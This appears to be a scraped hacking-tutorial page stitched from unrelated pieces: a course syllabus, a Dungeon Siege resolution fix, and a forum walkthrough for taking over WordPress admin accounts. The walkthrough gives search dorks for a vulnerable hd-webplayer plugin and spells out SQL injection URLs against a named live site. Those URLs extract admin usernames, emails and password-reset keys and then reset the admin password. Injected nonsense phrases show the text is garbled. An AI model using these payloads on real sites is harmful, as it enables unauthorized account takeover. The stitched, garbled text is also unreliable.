Shop Admin Hacking Tutorial Site

Hello friends in my previous class of How to hack websites, there i explained the various topics that we will cover in hacking classes. Let’s today start with the first topic Hacking Websites using SQL injection tutorial. If you have missed the previous hacking class don’t worry read it here.

Originally posted by:If you're encountering an offset game screen when changing the resolution, the cause of that seems to be the Windows 10 screen scaling (ie: Display 125% of normal).I was able to fix this offset in one of two ways: either set the Windows Display Settings scaling to 100%, or locate the DungeonSiege.exe - right click to open the File Properties, go to the Compatibility tab and select the Change high DPI settings box. Dungeon siege resolution patch Next set Override high DPI scaling behaviour and set it to Application. Thanks for looking into it, gonna add it to my document.

Training Summary

An Ethical Hacker exposes vulnerabilities in software to help business owners fix those security holes before a malicious hacker discovers them. In this course, you learn all about Ethical hacking with loads of live hacking examples to make the subject matter clear.

What should I know?

Nothing! This is an absolute beginner guide to Ethical hacking.

Course Syllabus

TutorialWhat is Hacking?
TutorialPotential Security Threats To Your Computer Systems
TutorialSkills Required to Become a Ethical Hacker
TutorialTop 20 Ethical Hacking Tools
TutorialHow to hack using Social Engineering
TutorialHow to make your data safe using Cryptography
TutorialHow to crack password of an Application
TutorialLearn everything about Trojans, Viruses, and Worms
TutorialLearn ARP Poisoning with Examples
TutorialWireshark Tutorial: Network & Passwords Sniffer
TutorialHow to hack wireless networks
TutorialUltimate guide to DoS(Denial of Service) Attacks
TutorialBEST DDoS Attack Tools
TutorialHow to Hack a Web Server
TutorialHow to Hack a Website
TutorialLearn SQL Injection with practical example
TutorialHacking Linux Systems
TutorialCISSP Certification Guide: What is, Prerequisites, Cost, CISSP Salary
TutorialWhat is Digital Forensics? History, Process, Types, Challenges
TutorialWhat is Cybercrime? Types, Tools, Examples
Tutorial10 Most Common Web Security Vulnerabilities
TutorialTop 30 Bug Bounty Programs
Tutorial40 Best Penetration Testing (Pen Testing) Tools
TutorialKali Linux Tutorial: What is, Install, Utilize Metasploit and Nmap
Tutorial11 Best Wireshark Alternatives
Tutorial13 BEST Vulnerability Assessment Scanners for Websites, Network
TutorialBest 16 No-Log VPN
Tutorial15 BEST Digital Forensic Tools
Tutorial17 Best IP & Network Scanning Tools
Tutorial11 Best FREE Firewall Software for Windows
TutorialTop 25 Ethical Hacking Interview Questions & Answers
TutorialTop 110 Cyber Security Interview Questions & Answers
TutorialCompTIA Certification Guide: Career Paths & Study Material
TutorialEthical Hacking Tutorial for Beginners PDF

Check our Live Penetration Testing Project

Dorks

# Dork 1 (config.php)
inurl:”/wp-content/plugins/hd-webplayer/config.php?id=”

# Dork 2 (playlist.php)
inurl:”/wp-content/plugins/hd-webplayer/playlist.php?videoid=”

# Dork 3 (General):
inurl:”/wp-content/plugins/hd-webplayer/”

When you found your site you need to find admin email and username.
I will be using this site for example:

http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=3

When i add ‘ text disappears so it is vulnerable.

NOTE: I will not demonstrate how to SQL inject.

Now we need admin username and email.
We need to inject: Magnificent feast mount and blade.

http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_email,0x3b),5,6,7,8,9,10,11 FROM wp_users--

Now we have 2 users.

We pick one and copy his email.
Go to the login page of the site.
It is usually here:

And press “Lost your password?

Now you enter either username or email.
We can enter both so it doesnt matter.
I entered email.

Now when you got:

“Check your e-mail for the confirmation link.”

It means that reset key is successfully sent.
Now we need to get the activation key.

Go back to the syntax you used for extracting email and username and do this:

http://www.thefreenudecelebritysite.com/wp-content/plugins/hd-webplayer/playlist.php?videoid=-3 UNION SELECT 1,2,3,group_concat(user_login,0x3a,user_activation_key,0x3b),5,6,7,8,9,10,11 FROM wp_users--

Voila!
Now we just need to reset it.

wp-login.php?action=rp&key=resetkey&login=username

NOTE: Replace key= & login=

So my link will be:

Enter new password:

Greets: Hackforums (For the tutorial) XL3gi0n Hackers Family Pride